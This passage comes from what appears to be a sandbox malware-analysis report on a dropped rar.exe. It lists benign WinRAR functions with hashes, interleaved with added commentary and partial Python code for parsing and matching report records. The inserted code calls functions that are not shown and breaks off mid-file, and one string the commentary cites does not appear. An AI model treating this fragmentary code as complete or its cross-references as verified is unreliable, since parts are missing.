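• GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47B2
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE_REPORT):
        print(classify(r), r.get("Opcode ID")[:16], [(n, hex(v)) for n, v in call_rvas(r)])
```

Feed it the text of two reports and `shared_functions` gives the function-level overlap, which is how an analyst checks whether the rar.exe dropped here is the same build seen in another submission without trusting file-level hashes; `call_rvas` turns the dump addresses into offsets usable in a disassembler opened on the dropped file.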

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                      • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction ID: 6ff7f1419171d1fdc4e318ab3b9a29ebec05f3c59f006e500bd68f6c952d3ef0
                                                                                                                                                                      • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction Fuzzy Hash: A8016D26B0865182E744AB66E98472EA762EBC5FD0F988032DE4D47B68CF7DD9468700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 751630497-0
                                                                                                                                                                      • Opcode ID: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                                                                                                                                      • Instruction ID: ac88a5fb7c6b3c66328c0c8bd89e3cfea07b425712fd1cf939e2e798fcab64bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                                                                                                                                      • Instruction Fuzzy Hash: BF22A163A0869395EB54EF30D4412BEFBA0FB5074CFC84037DA8D56699CE78E952CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e858063f55ff5e09d9a0e8ca2757e04015df25f8ee771d14e1c0be3fa39aa8fd
                                                                                                                                                                      • Instruction ID: cb40a04b68efc95b742da9ae23be2af79fce4fcd609585824dfe8f646faded09
                                                                                                                                                                      • Opcode Fuzzy Hash: e858063f55ff5e09d9a0e8ca2757e04015df25f8ee771d14e1c0be3fa39aa8fd
                                                                                                                                                                      • Instruction Fuzzy Hash: 70712772B0568186E708EF29E4057EC7391F7C8B98F844136DF6D8B399DF78A05287A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 042f37bf1d9aae1c410111ef79281188f45fa0ee488addf9bfa451285ac8130c
• Instruction ID: b9ed9b38b39f3103a11c7a05bc2ac06c7cf9d4843070f706a8d1757a1216df8b
• Opcode Fuzzy Hash: 042f37bf1d9aae1c410111ef79281188f45fa0ee488addf9bfa451285ac8130c
• Instruction Fuzzy Hash: EF22D422B1868385EB28EF29D440ABDA360FF85785FC04537EA4D576D9EF2CE906C710
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: aa337ab5f8c43cf777643fff5c7aa467dd26546ac349347de949bb186f7e8e74
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 62C1C763A0C58390EA24BE34C99A5FC9251AF4679DFDC4033DA4E4A5DADEACE503C331
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 9aaf6e13fb566eb9e5d2681a6728bbaaeafa0232ab259d5f8865e3177538c8e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                      • Instruction Fuzzy Hash: 45415A25A08A5385EA09AF6AA840D7DABA1BF85BD5FC84533CC1D17798DE7CE4438320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: ee58b8745832834798fcbdc25b0d02150e4d55f1055006038e3e7f2c649035c6
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: 62314C21E0C28381FA1CBB6CA451BBD9392AFC5784FC55437EE4D4B6D3DE2CA8068671
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A047DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A04831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A04853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7D7A0495D,?,?,?,00007FF7D79F7E7D), ref: 00007FF7D7A048A6
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: 03e043b3292d453e96e3778764b4401153f7d3dcd444e4806c85fceb5a443d3f
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: D831B522718A8241EB24EB65E8146BEA351FFC5795FC04532EE4D47B99EE6CD106C710
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F43D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F4402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F443E
Strings
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: 31e79356552cfc9adfe9b179ea9840c184fa643644289f3545adf1ef84d87c70
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: 8D116023A1874286EB15AF66E4005AEF3A1FF85BD8FC45132EA4E07A65DF3CD146C750
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Legend: Executed / Not Executed (rendered control-flow graph for the function at 7ff7d79c7a5b omitted; only the raw edge list survived extraction)
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: H9
                                                                                                                                                                      • API String ID: 0-2207570329
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3350704910-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                      • String ID: rar.lng
                                                                                                                                                                      • API String ID: 553376247-2410228151
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF7D79F4432,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F40C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79F40DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF7D79F40F1
  • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7D79F413F,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E34A0
  • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF7D79F413F,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E34D5
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction ID: 2ef34f6fe5bd0f05c975c29ea72fc5baa2f601523b6f76ea08bcd8f369aec978
• Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction Fuzzy Hash: 9C219F13B08A4381FA14AF26F8401BED361AF9ABD4BE85032DF4E47765DE3CD0468750
Uniqueness

Uniqueness Score: -1.00%
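The record above (SHGetSpecialFolderLocation, then SHGetPathFromIDListW, then CreateDirectoryW in a subcall, with the string WinRAR) is the "resolve a shell special folder and create a directory under it" routine of a WinRAR self-extracting stub: the snapshot name ends in _rar and the neighbouring records carry the strings WinRAR and default.sfx. Functions like this are shared library code, not the sample's own logic, and the Similarity fields (API String ID, Opcode ID, Instruction Fuzzy Hash) are what let you recognise the same function in other reports and set it aside. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the layout seen on this page into structured objects, flags the shell-folder-write pattern, and indexes records by a Similarity field for cross-report matching. The record layout (bullet lines, "ref:" addresses, "Uniqueness Score" as record terminator) is assumed from the page text, the two sample records are constructed, abbreviated copies of records on this page, and the API name sets used for the flag are the author's own choice.

```python
"""Parse Joe Sandbox 'executed functions' records and triage them.

Added example, not Joe Sandbox code. The record layout is assumed from
the report text: API calls appear as '• Name.MODULE(args), ref: ADDRESS'
(optionally prefixed with 'Part of subcall function X:'), metadata as
'• Label: value', and each record ends with a 'Uniqueness Score:' line.
"""
import re
from dataclasses import dataclass, field

# Matches '• SHGetPathFromIDListW.SHELL32 ref: 00007FF7D79F40F1' and
# '• Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(...), ref: ...'
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)
# Matches '• API String ID: 977838571-3970807970', '• String ID: WinRAR', '• String ID:'
META_LINE = re.compile(r"•\s*([A-Za-z ]+?):\s*(.*)")

# Assumed (author's choice): APIs that resolve a shell special folder and
# APIs that create a directory. Both in one function = the SFX-stub
# "write under a shell folder" behaviour seen in the record above.
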